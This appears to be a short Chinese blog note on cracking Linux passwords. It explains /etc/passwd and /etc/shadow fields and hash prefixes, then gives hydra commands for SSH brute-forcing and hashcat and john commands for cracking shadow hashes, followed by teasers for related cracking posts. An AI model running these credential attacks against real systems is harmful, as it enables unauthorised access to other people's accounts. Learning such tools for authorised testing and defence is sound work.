工具記錄 Linux口令破解

2022-01-24 04:56:09 字數 1241 閱讀 7368

字段含義如下:

使用者名稱:口令:使用者標識號:組標識號:注釋性描述:主目錄:登入shell

eg:root:x:0:0:root:/root:/bin/bash

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

mysql:x:117:125:mysql server,,,:/nonexistent:/bin/false

/etc/shadow:

字段含義如下:

eg:root:!:17043:0:99999:7:::

sshd:*:17043:0:99999:7:::

mysql:!:17048:0:99999:7:::

如果為空,則對應使用者登入時不需要口令;

星號代表帳號被鎖定;

雙嘆號表示這個密碼已經過期了;

$6$開頭的,表明是用sha-512加密;

$1$表明是用md5加密;

$2$ 是用blowfish加密;

$5$ 是用 sha-256加密;

hydra -l /root/desktop/使用者名稱.txt -p /root/desktop/密碼.txt -o /root/desktop/輸出.txt -e n -t 6 -vv -s 埠 192.169.14.129 ssh
注:-e n 測試空密碼

將shadow檔案裡含有密文資訊的字段儲存為文字進行破解。

/root/desktop/password.list為自定義字典

root@kali:~/desktop# ./hashcat-cli64.bin -m 1800 -a 0 -o found1.txt --remove /root/desktop/hascat_pass.txt /root/desktop/password.list
# 破密碼

root@kali:~/desktop#john /root/desktop/etc_shadow.txt

# 檢視破解後的密碼

root@kali:~/desktop#john /root/desktop/etc_shadow.txt --show

hashcat

john the ripper使用方法概述

linux 系統中 /etc/passwd 和 /etc/shadow檔案詳解

python 弱口令暴力破解工具

環境 python 3.6.7 coding utf 8 import pymysql success false f user open username.txt r f pwd open password.txt r lines user f user.readlines 讀取出來是乙個列表 l...

破解root口令

今天小編示範如何破解root口令,以及進行grub加密後再次破解口令的實驗。一 三步破解root口令 流程 啟動系統時,設定其執行級別1,進入單使用者模式。編輯grub選單 選定要編輯的title,而後使用e命令 在kernel所在行,鍵入 b 命令,重啟後passwd直接修改root口令,就這樣快...

UNIX口令破解機

以下需要在linux系統執行 import crypt def testpass cryptpass salt cryptpass 0 2 取前兩個,沒用的,他們會置於加密後密碼的前面,我們不需要 dictfile open dictionary.txt r 存了所有簡單的密碼,一一試探 for w...